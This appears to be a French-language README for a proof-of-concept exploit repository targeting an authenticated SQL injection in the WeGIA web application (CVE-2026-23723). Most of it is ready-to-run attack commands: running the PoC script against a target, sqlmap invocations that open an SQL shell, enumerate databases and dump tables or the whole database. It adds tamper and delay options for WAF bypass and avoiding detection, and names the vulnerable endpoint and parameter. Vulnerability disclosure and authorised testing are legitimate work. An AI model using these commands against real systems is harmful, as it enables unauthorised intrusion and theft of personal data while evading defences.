
Ce script d'assistance léger en Python est conçu pour automatiser la génération de fichiers PoC compatibles avec sqlmap pour la vulnérabilité d'injection SQL basée sur les erreurs authentifiée dans WeGIA (≤ 3.6.1), identifiée sous le nom GHSA-xfmp-2hf9-gfjp.
Injection SQL basée sur les erreurs authentifiée dans WeGIA ≤ 3.6.1
GHSA-xfmp-2hf9-gfjp | Avis officiel
Auteur original du PoC / Rapporteur : ViniCastro2001 GHSA publié par : nilsonLazarin (mainteneur du projet)
Ce script Python léger automatise :
id_memorando=1*)--sql-shell)requests (la plupart des environnements de test d'intrusion l'ont déjà)git clone https://github.com/Ch35h1r3c47/CVE-2026-23723-POC.git
cd CVE-2026-23723-POC
# Recommandé : invite de saisie interactive du mot de passe
python CVE-2026-23723.py --url http://target.com -u admin
# Fournir le mot de passe directement
python CVE-2026-23723.py --url http://target.com -u admin -p wegia
# Fichier de sortie personnalisé
python CVE-2026-23723.py --url http://target.com -u admin -p wegia --output custom.req
Après une exécution réussie, le script va :
Tenter la connexion Générer wegia_sqlmap.req (ou votre nom de fichier personnalisé) Afficher les commandes sqlmap prêtes à l'emploi
# 1. Shell interactif de type MySQL (le plus recommandé)
sqlmap -r wegia_sqlmap.req --sql-shell --batch --dbms=mariadb
# 2. Afficher la base courante et toutes les bases
sqlmap -r wegia_sqlmap.req --current-db --dbs --batch
# 3. Lister les tables de la base wegia
sqlmap -r wegia_sqlmap.req -D wegia --tables --batch
# 4. Extraire une table spécifique (exemple : funcionario)
sqlmap -r wegia_sqlmap.req -D wegia -T funcionario --dump --threads=2 --batch
# 5. Extraire toute la base wegia (attention !)
sqlmap -r wegia_sqlmap.req -D wegia --dump-all --threads=3 --batch --output-dir=./dump
Options sqlmap facultatives :
--proxy=http://127.0.0.1:8080 (via Burp/ZAP)
--tamper=space2comment,randomcase (contournement WAF basique)
--delay=1 (ralentir pour éviter la détection)
Si la connexion automatique échoue Connectez-vous manuellement via le navigateur → copiez l'en-tête Cookie complet → exécutez sqlmap directement :
sqlmap -u "http://target.com/controle/control.php?nomeClasse=Atendido_ocorrenciaControle&metodo=listarTodosComAnexo&id_memorando=*" \
--cookie="PHPSESSID=xxxxxxxx; other_cookie=yyy" \
--sql-shell --batch
Avertissement légal Ce PoC est fourni uniquement à des fins éducatives et de tests d'intrusion autorisés. Toute utilisation non autorisée contre un système est illégale et interdite. L'auteur et les contributeurs déclinent toute responsabilité en cas d'utilisation abusive ou de dommages causés. Références
GHSA-xfmp-2hf9-gfjp CVE-2026-23723